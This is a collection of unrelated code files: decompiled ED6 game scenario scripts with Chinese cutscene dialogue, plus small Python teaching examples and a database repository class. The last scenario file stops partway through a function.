"Function_0_1BA", # 00, 0 "Function_1_1C9", # 01, 1 "Function_2_1E1", # 02, 2 ) def Function_0_1BA(): pass label("Function_0_1BA") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 2)), scpexpr(EXPR_END)), "loc_1C8") OP_A3(0x3FA) Event(0, 2) label("loc_1C8") Return() # Function_0_1BA end def Function_1_1C9(): pass label("Function_1_1C9") OP_4F(0x1, (scpexpr(EXPR_PUSH_LONG, 0x65), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_72(0x3, 0x4) Event(0, 2) OP_22(0x1C4, 0x1, 0x64) Return() # Function_1_1C9 end def Function_2_1E1(): pass label("Function_2_1E1") OP_22(0x75, 0x0, 0x64) EventBegin(0x0) FadeToBright(2000, 0) OP_B0(0x2, 0xF) OP_6D(-15160, -2990, -35260, 0) OP_67(0, 4070, -10000, 0) OP_6B(1530, 0) OP_6C(0, 0) OP_6E(581, 0) OP_72(0x1, 0x2) OP_71(0x1, 0x40) OP_72(0x0, 0x2) OP_71(0x0, 0x40) OP_89(0x101, 59410, -2000, -3710, 270) OP_89(0x102, 61470, -2000, -4030, 270) OP_89(0x105, 60400, -2000, -3500, 270) def lambda_27F(): OP_6D(-14060, 2029, -15000, 6000) ExitThread() QueueWorkItem(0x101, 1, lambda_27F) def lambda_297(): OP_6C(314000, 11000) ExitThread() QueueWorkItem(0x101, 3, lambda_297) Sleep(3000) def lambda_2AC(): OP_6B(2620, 5000) ExitThread() QueueWorkItem(0x101, 0, lambda_2AC) def lambda_2BC(): OP_67(0, 8750, -10000, 5000) ExitThread() QueueWorkItem(0x101, 2, lambda_2BC) OP_6E(904, 8000) OP_44(0x101, 0xFF) Fade(1000) OP_6D(-6160, -2990, -12620, 0) OP_67(0, 4470, -10000, 0) OP_6B(2800, 0) OP_6C(314000, 0) OP_6E(388, 0) SetChrBattleFlags(0x8, 0x20) ClearChrFlags(0x8, 0x80) OP_89(0x8, 1090, -2890, -16110, 270) OP_0D() ChrTalk( 0x8, ( "#668F这、这飞艇是什么东西！\x02\x03", "是王国军的……\x01", "不对，这个徽章是……\x02", ) ) CloseMessageWindow() ClearChrFlags(0x9, 0x80) ClearChrFlags(0xA, 0x80) ClearChrFlags(0xB, 0x80) ClearChrFlags(0xC, 0x80) ClearChrFlags(0xD, 0x80) SetChrBattleFlags(0x9, 0x20) SetChrBattleFlags(0xA, 0x20) SetChrBattleFlags(0xB, 0x20) SetChrBattleFlags(0xC, 0x20) SetChrBattleFlags(0xD, 0x20) OP_89(0x9, -13380, 10050, -12580, 90) OP_89(0xA, -15510, 10050, -11720, 90) OP_89(0xB, -15520, 10050, -13390, 90) OP_89(0xC, -15520, 10050, -13390, 90) OP_89(0xD, -14360, 10050, -10980, 90) NpcTalk( 0x9, "女性的声音", ( "#4P……王室亲卫队所属。\x01", "高速巡洋舰『埃尔赛尤号』。\x02\x03", "这就是本舰的名字。\x02", ) ) CloseMessageWindow() def lambda_489(): OP_6D(-6340, -540, -14100, 3000) ExitThread() QueueWorkItem(0x101, 0, lambda_489) def lambda_4A1(): OP_67(0, 5660, -10000, 3000) ExitThread() QueueWorkItem(0x101, 1, lambda_4A1) def lambda_4B9(): OP_6B(2680, 3000) ExitThread() QueueWorkItem(0x101, 2, lambda_4B9) def lambda_4C9(): OP_6E(435, 3000) ExitThread() QueueWorkItem(0x101, 3, lambda_4C9) def lambda_4D9(): OP_6C(329000, 3000) ExitThread() QueueWorkItem(0x102, 0, lambda_4D9) Sleep(3000) NpcTalk( 0x9, "女性军官", ( "#170F咳咳……\x01", "看来总算是赶上了。\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#668F蓝白色军服……\x01", "难道是女王陛下的亲卫队！？\x02", ) ) CloseMessageWindow() NpcTalk( 0x9, "女性军官", ( "#176F正是如此。\x02\x03", "本人就是任职亲卫队中队长的\x01", "尤莉亚·舒华兹。\x02", ) ) CloseMessageWindow() Sleep(400) ChrTalk( 0x9, ( "#172F卢安市长，\x01", "莫里斯·戴尔蒙先生。\x02\x03", "你涉嫌纵火、抢劫、强占等多项罪行，\x01", "现在，我要将你拘捕归案。\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#668F这是梦……\x01", "一定是梦……\x02\x03", "#664F啊……怎么搞的……\x02", ) ) CloseMessageWindow() Fade(500) ClearChrFlags(0x8, 0x80) SetChrFlags(0x8, 0x4) SetChrPos(0x8, 370, -2300, -16090, 180) OP_51(0x8, 0x2A, (scpexpr(EXPR_PUSH_LONG, 0x7530), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_51(0x8, 0x2B, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_51(0x8, 0x2C, (scpexpr(EXPR_PUSH_LONG, 0xFFFEA070), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_51(0x8, 0x2D, (scpexpr(EXPR_PUSH_LONG, 0x3E8), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_51(0x8, 0x2E, (scpexpr(EXPR_PUSH_LONG, 0x3E8), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_51(0x8, 0x2F, (scpexpr(EXPR_PUSH_LONG, 0x3E8), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_8C(0x8, 0, 300) OP_22(0x20C, 0x0, 0x64) OP_A1(0xE, 0x1) SetChrPos(0xE, 25470, -2990, -32360, 114) SetChrFlags(0xE, 0x40) SetChrFlags(0xE, 0x4) SetChrFlags(0x0, 0x20) SetChrFlags(0x1, 0x20) SetChrFlags(0x2, 0x20) SetChrChipByIndex(0x101, 3) SetChrChipByIndex(0x102, 4) SetChrChipByIndex(0x105, 5) def lambda_74F(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x2710, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_74F) Sleep(1700) OP_22(0xD4, 0x0, 0x64) def lambda_774(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x2328, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_774) Sleep(700) def lambda_794(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x1F40, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_794) Sleep(600) def lambda_7B4(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x1B58, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_7B4) def lambda_7CF(): OP_6D(-10020, 100, -16530, 3000) ExitThread() QueueWorkItem(0x101, 0, lambda_7CF) Sleep(400) def lambda_7EC(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x1770, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_7EC) Sleep(300) def lambda_80C(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x1388, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_80C) Sleep(200) def lambda_82C(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0xFA0, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_82C) Sleep(200) def lambda_84C(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0xBB8, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_84C) Sleep(200) def lambda_86C(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x7D0, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_86C) Sleep(200) def lambda_88C(): OP_8F(0xFE, 0xFFFFDF12, 0xFFFFF452, 0xFFFFBC80, 0x3E8, 0x0) ExitThread() QueueWorkItem(0xE, 1, lambda_88C) WaitChrThread(0x101, 0x0) Fade(1000) SetChrChipByIndex(0x101, 65535) SetChrChipByIndex(0x102, 65535) SetChrChipByIndex(0x105, 65535) OP_0D() Sleep(500) OP_62(0x101, 0x0, 2000, 0x0, 0x1, 0xFA, 0x2) OP_22(0x26, 0x0, 0x64) OP_62(0x102, 0x0, 2000, 0x0, 0x1, 0xFA, 0x2) OP_22(0x26, 0x0, 0x64) Sleep(1000) ChrTalk( 0x101, ( "#004F这、这是……\x01", "到底是怎么回事啊？\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#014F我刚在想嘉恩先生请求支援的\x01", "王国军能不能及时赶到……\x02\x03", "即使是这样，\x01", "军队也似乎来得太快了吧……\x02", ) ) CloseMessageWindow() ChrTalk( 0x105, "#048F……呵呵………\x02", ) CloseMessageWindow() OP_8C(0x9, 135, 400) Sleep(400) ChrTalk( 0x9, ( "#171F啊，诸位游击士。\x02\x03", "很感谢诸位的帮忙。\x01", "接下来的事就请交给我们吧。\x02", ) ) CloseMessageWindow() FadeToDark(2000, 0, -1) OP_0D() OP_31(0x0, 0xFE, 0x0) OP_31(0x1, 0xFE, 0x0) OP_31(0x2, 0xFE, 0x0) OP_31(0x3, 0xFE, 0x0) OP_31(0x4, 0xFE, 0x0) OP_31(0x5, 0xFE, 0x0) OP_31(0x6, 0xFE, 0x0) OP_31(0x7, 0xFE, 0x0) ClearMapFlags(0x2000000) OP_A2(0x3FA) NewScene("ED6_DT01/T2102 ._SN", 100, 0, 0) IdleLoop() Return() # Function_2_1E1 end SaveToFile() Try(main)

# Exemplo de polimorfismo usando python # Autor ~ Dilson class Ponto: def __init__(self, x, y): self.x = x self.y = y def print_info (self): print ("Centro = (", self.x, ",", self.y, ")") class Circ(Ponto): #herança def __init__(self, x, y, r): Ponto.__init__(self, x, y) self.raio = r def print_info (self): Ponto.print_info (self) #herança print ("Raio = ", self.raio) print ("Ponto:") p1 = Ponto(2, 1) p1.print_info() print ("\nCirculo:") c1 = Circ (5, 4, 3) c1.print_info() print ("\n#Lista:\n") lista_diferentes = [p1, c1] print ("Primero:") lista_diferentes[0].print_info () # Polimorfismo - cada um responde de acordo com sua própria especificação # #é possível chamar o método correto! print ("\nSegundo:") # repare que o para o primeiro imprime somente o ponto lista_diferentes[1].print_info () # para o segundo imprime o ponto + raio

print("--Gestor de Promedios--") nota1 = int(input("Digite la primera nota: ")) nota2 = int(input("Digite la segunda nota: ")) nota3 = int(input("Digite la tercera nota: ")) promedio = (nota1 + nota2 + nota3)/3 if promedio >= 70: print("El promedio obtenido en base a las notas ingresadas es :",promedio) print("Aprobado") elif promedio < 70: print("El promedio obtenido en base a las notas ingresadas es :",promedio) print("Reprobado")

#coding:utf-8 from exception.exceptions import ProjectNotFoundError from dao.database import Database from dao.project.project import ProjectDao from dao.project.find import ProjectFindDao from dao.project.sql import ProjectSQL from model.project import Project """ """ class ProjectRepository(object): def __init__(self, db): self.__db = db def find_by_id(self, id_): sql = ProjectSQL() sql.where("id = ?") sql.order_by("name ASC") dao = ProjectFindDao(self.__db, sql.build(), [id_]) record = dao.get() if len(record) == 0: raise ProjectNotFoundError() return Project( record[0]["id"], record[0]["name"], record[0]["description"], record[0]["status"], record[0]["created"], record[0]["user_id"] ) def find_by_name(self, name): sql = ProjectSQL() sql.where("name = ?") sql.order_by("name ASC") dao = ProjectFindDao(self.__db, sql.build(), [name]) record = dao.get() if len(record) == 0: raise ProjectNotFoundError() return Project( record[0]["id"], record[0]["name"], record[0]["description"], record[0]["status"], record[0]["created"], record[0]["user_id"] ) def fetch_all(self): sql = ProjectSQL() sql.where("0 = 0") sql.order_by("name ASC") dao = ProjectFindDao(self.__db, sql.build(), []) record = dao.get() result = [] for item in record: _ = Project( item["id"], item["name"], item["description"], item["status"], item["created"], item["user_id"] ) result.append(_) return result def add_project(self, project, user): dao = ProjectDao(self.__db, project, user) self.__db.begin_trans() dao.create() self.__db.commit() def update_project(self, project, user): dao = ProjectDao(self.__db, project, user) self.__db.begin_trans() dao.update() self.__db.commit() def delete_project(self, project): dao = ProjectDao(self.__db, project, user) self.__db.begin_trans() dao.delete() self.__db.commit()

#首先生成随机数，并写人文本文件中; #接着打开文本文件，将里面的数字输出 #导入随机数生成的包 from random import randint def main(): #打开一个存放随机的文件 randtxt=open('yjy_file_txt_writeread_random_teach.txt','w') for i in range(20): randtxt.write(str(randint(0,9))+",") randtxt.close() #将存储在文本文件中的数字提取出来并显示 randtxtread=open('yjy_file_txt_writeread_random_teach.txt','r') s=randtxtread.read() #使用split函数将随机数字符串按照,分割，并返回一个列表 stringnumbers=s.split(',') #print(stringnumber) for number in stringnumbers: print (number ,end=" ") randtxtread.close() main()

from ED6ScenarioHelper import * def main(): # 蔡斯飞艇坪 CreateScenaFile( FileName = 'T3101 ._SN', MapName = 'Zeiss', Location = 'T3101.x', MapIndex = 1, MapDefaultBGM = "ed60013", Flags = 0, EntryFunctionIndex = 0xFFFF, Reserved = 0, IncludedScenario = [ '', '', '', '', '', '', '', '' ], ) BuildStringList( '@FileName', # 8 '朵洛希', # 9 '玛多克工房长', # 10 '特莱斯主任', # 11 '海泽尔', # 12 '索黛丽娅', # 13 '阿利瑟', # 14 '米优', # 15 '斯坦因', # 16 '温丝', # 17 '埃尔文', # 18 '王', # 19 '莱恩', # 20 '科奇莫爷爷', # 21 '莫妮卡', # 22 '布鲁诺', # 23 '伊格尔', # 24 '普利亚姆', # 25 '爱玲', # 26 '雷曼', # 27 '鲁迪', # 28 '菲', # 29 '埃里克', # 30 '康丝坦茨', # 31 '雨果', # 32 '安东尼', # 33 '普罗梅笛', # 34 '雷伊', # 35 '蒂亚利', # 36 '米妮亚姆', # 37 '威尔姆', # 38 '格斯塔夫维修长', # 39 ' ', # 40 '蔡斯飞艇坪', # 41 '蔡斯市·市街区', # 42 ) DeclEntryPoint( Unknown_00 = 0, Unknown_04 = 0, Unknown_08 = 6000, Unknown_0C = 4, Unknown_0E = 0, Unknown_10 = 0, Unknown_14 = 9500, Unknown_18 = -10000, Unknown_1C = 0, Unknown_20 = 0, Unknown_24 = 0, Unknown_28 = 2800, Unknown_2C = 262, Unknown_30 = 45, Unknown_32 = 0, Unknown_34 = 360, Unknown_36 = 0, Unknown_38 = 0, Unknown_3A = 0, InitScenaIndex = 0, InitFunctionIndex = 0, EntryScenaIndex = 0, EntryFunctionIndex = 1, ) AddCharChip( 'ED6_DT07/CH02070 ._CH', # 00 'ED6_DT07/CH02620 ._CH', # 01 'ED6_DT07/CH01190 ._CH', # 02 'ED6_DT07/CH01540 ._CH', # 03 'ED6_DT07/CH01030 ._CH', # 04 'ED6_DT07/CH01130 ._CH', # 05 'ED6_DT07/CH01050 ._CH', # 06 'ED6_DT07/CH01200 ._CH', # 07 'ED6_DT07/CH01470 ._CH', # 08 'ED6_DT07/CH01040 ._CH', # 09 'ED6_DT07/CH01760 ._CH', # 0A 'ED6_DT07/CH01450 ._CH', # 0B 'ED6_DT07/CH01100 ._CH', # 0C 'ED6_DT07/CH02490 ._CH', # 0D 'ED6_DT07/CH01530 ._CH', # 0E 'ED6_DT07/CH01250 ._CH', # 0F 'ED6_DT07/CH01140 ._CH', # 10 'ED6_DT07/CH01150 ._CH', # 11 'ED6_DT07/CH01450 ._CH', # 12 'ED6_DT07/CH01500 ._CH', # 13 'ED6_DT07/CH01550 ._CH', # 14 'ED6_DT07/CH01450 ._CH', # 15 'ED6_DT07/CH01230 ._CH', # 16 'ED6_DT07/CH01680 ._CH', # 17 'ED6_DT07/CH01700 ._CH', # 18 'ED6_DT07/CH01100 ._CH', # 19 'ED6_DT07/CH01220 ._CH', # 1A 'ED6_DT07/CH01660 ._CH', # 1B 'ED6_DT07/CH01430 ._CH', # 1C 'ED6_DT07/CH01450 ._CH', # 1D 'ED6_DT07/CH02440 ._CH', # 1E ) AddCharChipPat( 'ED6_DT07/CH02070P._CP', # 00 'ED6_DT07/CH02620P._CP', # 01 'ED6_DT07/CH01190P._CP', # 02 'ED6_DT07/CH01540P._CP', # 03 'ED6_DT07/CH01030P._CP', # 04 'ED6_DT07/CH01130P._CP', # 05 'ED6_DT07/CH01050P._CP', # 06 'ED6_DT07/CH01200P._CP', # 07 'ED6_DT07/CH01470P._CP', # 08 'ED6_DT07/CH01040P._CP', # 09 'ED6_DT07/CH01760P._CP', # 0A 'ED6_DT07/CH01450P._CP', # 0B 'ED6_DT07/CH01100P._CP', # 0C 'ED6_DT07/CH02490P._CP', # 0D 'ED6_DT07/CH01530P._CP', # 0E 'ED6_DT07/CH01250P._CP', # 0F 'ED6_DT07/CH01140P._CP', # 10 'ED6_DT07/CH01150P._CP', # 11 'ED6_DT07/CH01450P._CP', # 12 'ED6_DT07/CH01500P._CP', # 13 'ED6_DT07/CH01550P._CP', # 14 'ED6_DT07/CH01450P._CP', # 15 'ED6_DT07/CH01230P._CP', # 16 'ED6_DT07/CH01680P._CP', # 17 'ED6_DT07/CH01700P._CP', # 18 'ED6_DT07/CH01100P._CP', # 19 'ED6_DT07/CH01220P._CP', # 1A 'ED6_DT07/CH01660P._CP', # 1B 'ED6_DT07/CH01430P._CP', # 1C 'ED6_DT07/CH01450P._CP', # 1D 'ED6_DT07/CH02440P._CP', # 1E ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 0, ChipIndex = 0x0, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 24, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 1, ChipIndex = 0x1, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 23, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 2, ChipIndex = 0x2, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 14, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 3, ChipIndex = 0x3, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 26, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 4, ChipIndex = 0x4, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 36, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 5, ChipIndex = 0x5, NpcIndex = 0x101, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 37, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 6, ChipIndex = 0x6, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 38, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 7, ChipIndex = 0x7, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 39, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 8, ChipIndex = 0x8, NpcIndex = 0x101, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 40, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 9, ChipIndex = 0x9, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 41, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 10, ChipIndex = 0xA, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 42, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 11, ChipIndex = 0xB, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 32, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 12, ChipIndex = 0xC, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 33, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 13, ChipIndex = 0xD, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 34, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 14, ChipIndex = 0xE, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 35, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 15, ChipIndex = 0xF, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 19, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 16, ChipIndex = 0x10, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 30, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 17, ChipIndex = 0x11, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 31, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 18, ChipIndex = 0x12, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 29, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 19, ChipIndex = 0x13, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 28, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 20, ChipIndex = 0x14, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 27, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 21, ChipIndex = 0x15, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 25, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 22, ChipIndex = 0x16, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 3, TalkFunctionIndex = 0, TalkScenaIndex = 22, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 23, ChipIndex = 0x17, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 20, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 24, ChipIndex = 0x18, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 21, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 25, ChipIndex = 0x19, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 18, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 26, ChipIndex = 0x1A, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 17, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 27, ChipIndex = 0x1B, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 16, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 28, ChipIndex = 0x1C, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 15, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 29, ChipIndex = 0x1D, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 13, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 180, Unknown2 = 0, Unknown3 = 30, ChipIndex = 0x1E, NpcIndex = 0x181, InitFunctionIndex = 0, InitScenaIndex = 11, TalkFunctionIndex = 0, TalkScenaIndex = 12, ) DeclNpc( X = 0, Z = 0, Y = 0, Direction = 0, Unknown2 = 0, Unknown3 = 0, ChipIndex = 0x0, NpcIndex = 0x181, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = -23030, Z = 8000, Y = 86970, Direction = 0, Unknown2 = 0, Unknown3 = 0, ChipIndex = 0x0, NpcIndex = 0xFF, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclNpc( X = 28060, Z = 8000, Y = 58980, Direction = 0, Unknown2 = 0, Unknown3 = 0, ChipIndex = 0x0, NpcIndex = 0xFF, InitFunctionIndex = -1, InitScenaIndex = -1, TalkFunctionIndex = -1, TalkScenaIndex = -1, ) DeclEvent( X = -10910, Y = 7000, Z = 63300, Range = -12900, Unknown_10 = 0x2328, Unknown_14 = 0xD480, Unknown_18 = 0x0, Unknown_1C = 45, ) DeclEvent( X = -19010, Y = 7000, Z = 74090, Range = -26870, Unknown_10 = 0x2328, Unknown_14 = 0x12714, Unknown_18 = 0x0, Unknown_1C = 52, ) DeclEvent( X = -50430, Y = 24000, Z = 53980, Range = 3000, Unknown_10 = 0xBB8, Unknown_14 = 0x0, Unknown_18 = 0x40, Unknown_1C = 43, ) DeclEvent( X = -35690, Y = 9750, Z = 58940, Range = 1500, Unknown_10 = 0x7D0, Unknown_14 = 0x0, Unknown_18 = 0x41, Unknown_1C = 54, ) DeclEvent( X = -23010, Y = 7750, Z = 74850, Range = 1500, Unknown_10 = 0xBB8, Unknown_14 = 0x0, Unknown_18 = 0x41, Unknown_1C = 55, ) DeclActor( TriggerX = -50000, TriggerZ = 25000, TriggerY = 54010, TriggerRange = 800, ActorX = -50000, ActorZ = 26000, ActorY = 54010, Flags = 0x7C, TalkScenaIndex = 0, TalkFunctionIndex = 44, Unknown_22 = 0, ) ScpFunction( "Function_0_6A6", # 00, 0 "Function_1_E70", # 01, 1 "Function_2_10C0", # 02, 2 "Function_3_10F6", # 03, 3 "Function_4_127E", # 04, 4 "Function_5_12A2", # 05, 5 "Function_6_12C6", # 06, 6 "Function_7_12EA", # 07, 7 "Function_8_130E", # 08, 8 "Function_9_1332", # 09, 9 "Function_10_1356", # 0A, 10 "Function_11_137A", # 0B, 11 "Function_12_137B", # 0C, 12 "Function_13_13E0", # 0D, 13 "Function_14_1445", # 0E, 14 "Function_15_14AB", # 0F, 15 "Function_16_14F2", # 10, 16 "Function_17_154C", # 11, 17 "Function_18_15F0", # 12, 18 "Function_19_1676", # 13, 19 "Function_20_17F8", # 14, 20 "Function_21_18B0", # 15, 21 "Function_22_18D1", # 16, 22 "Function_23_1BD8", # 17, 23 "Function_24_1C7C", # 18, 24 "Function_25_1CEE", # 19, 25 "Function_26_1D4F", # 1A, 26 "Function_27_1DCC", # 1B, 27 "Function_28_1DF3", # 1C, 28 "Function_29_1E5B", # 1D, 29 "Function_30_2039", # 1E, 30 "Function_31_2938", # 1F, 31 "Function_32_2D9D", # 20, 32 "Function_33_2E46", # 21, 33 "Function_34_2F88", # 22, 34 "Function_35_2F8F", # 23, 35 "Function_36_2F96", # 24, 36 "Function_37_3042", # 25, 37 "Function_38_34EF", # 26, 38 "Function_39_35C8", # 27, 39 "Function_40_3615", # 28, 40 "Function_41_3890", # 29, 41 "Function_42_3D8A", # 2A, 42 "Function_43_4383", # 2B, 43 "Function_44_4399", # 2C, 44 "Function_45_4421", # 2D, 45 "Function_46_477F", # 2E, 46 "Function_47_4AD9", # 2F, 47 "Function_48_5917", # 30, 48 "Function_49_6273", # 31, 49 "Function_50_6778", # 32, 50 "Function_51_6ECF", # 33, 51 "Function_52_7169", # 34, 52 "Function_53_7383", # 35, 53 "Function_54_7BFF", # 36, 54 "Function_55_7C03", # 37, 55 ) def Function_0_6A6(): pass label("Function_0_6A6") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 2)), scpexpr(EXPR_END)), "loc_6B4") OP_A3(0x3FA) Event(0, 50) label("loc_6B4") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 3)), scpexpr(EXPR_END)), "loc_6CB") OP_4F(0x1, (scpexpr(EXPR_PUSH_LONG, 0x56), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_A3(0x3FB) Event(0, 51) label("loc_6CB") Switch( (scpexpr(EXPR_PUSH_VALUE_INDEX, 0x0), scpexpr(EXPR_END)), (100, "loc_6E3"), (103, "loc_722"), (107, "loc_722"), (104, "loc_735"), (SWITCH_DEFAULT, "loc_73D"), ) label("loc_6E3") 